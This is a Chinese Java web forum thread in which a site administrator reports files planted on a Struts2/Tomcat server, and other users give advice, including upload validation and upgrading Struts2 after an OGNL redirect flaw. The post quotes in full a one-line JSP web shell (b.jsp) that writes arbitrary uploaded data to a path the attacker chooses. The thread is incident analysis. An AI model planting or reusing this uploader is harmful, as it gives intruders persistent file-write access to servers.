struts2 的网站被人植入木马

小灰狼 技术主管  2015-12-17 03:40:35
一个JAVA WEB应用,CentOS 7 + tomcat / struts2 的网站,在ROOT根目录下莫名其妙多了如下几个文件
0 1.txt
b.jsp
bak.jsp
debug.exe
guige.jsp
IFD说锟斤拷锟斤拷.pdf
Json.dll
lndex.jsp
one.jsp
one8.jsp
wget-log

其中 b.jsp 的文件内容如下(其它的有点长,暂时不帖了):
<%@page import="java.io.*"%><%if(request.getParameter("f")!=null){FileOutputStream os=new FileOutputStream(application.getRealPath("/")+request.getParameter("f"));InputStream is=request.getInputStream();byte[] b=new byte[512];int n;while((n=is.read(b,0,512))!=-1){os.write(b,0,n);}os.close();is.close();}%>


初步估计是 struts2 的漏洞导致的,但没有任何线索
谁能指导一下方向

谢谢!
...全文
232 点赞 收藏 6
写回复
6 条回复
切换为时间正序
当前发帖距今超过3年,不再开放新的回复
发表回复
_南天北落 2015-12-18
form表单的时候对提交的文件进行检验。 1. 通过后缀名来区别。后缀名规则 2. 如果手动更改了后缀名你可以根据文件的魔术数字来区分 文件上传-魔术数学 这些应该足够保证服务器上上传的东西安全 3. struts的漏洞的话,升级struts的漏洞包。 上面这个保证struts的安全,你可以试试。
回复
小灰狼 2015-12-18
自己 up 一下 求高人指点
回复
wrong1111 2015-12-18
struts2 很久之前就已经暴露出来了BUG,现在我们已经放弃不使用了,直接使用spring的mvc
回复
小灰狼 2015-12-18
已经找到问题所在了,是 struts2 的重定向漏洞,通过测试已经发现黑客可以通过一个 url 让服务端执行一段指定的OGNL代码,从而植入木马 升级 jar 之后解决 但是,struts2 的这个漏洞好危险啊,我的系统有网上交易的!
回复
小灰狼 2015-12-17
有线索吗 不知道如何查找
回复
u010053498 2015-12-17
没有遇到过。 只是猜测 大概了解下这些文件的大体意图(是人家恶作剧玩笑、做测试、还是带有恶意的获取信息,修改信息) 你在你的网站输入表单部分 或者 其他能够上传至服务器的部分 做好校验 如果可以最好能够捕获 登陆人的账号等信息(可能还会来拜访你的) 然后你只能仔细排查 测试了 网上以前依稀看过。 解决了的话 希望到时候@下分享一下。
回复
相关推荐
发帖
Web 开发
创建于2007-09-28

8.0w+

社区成员

Java Web 开发
申请成为版主
帖子事件
创建了帖子
2015-12-17 03:40
社区公告
暂无公告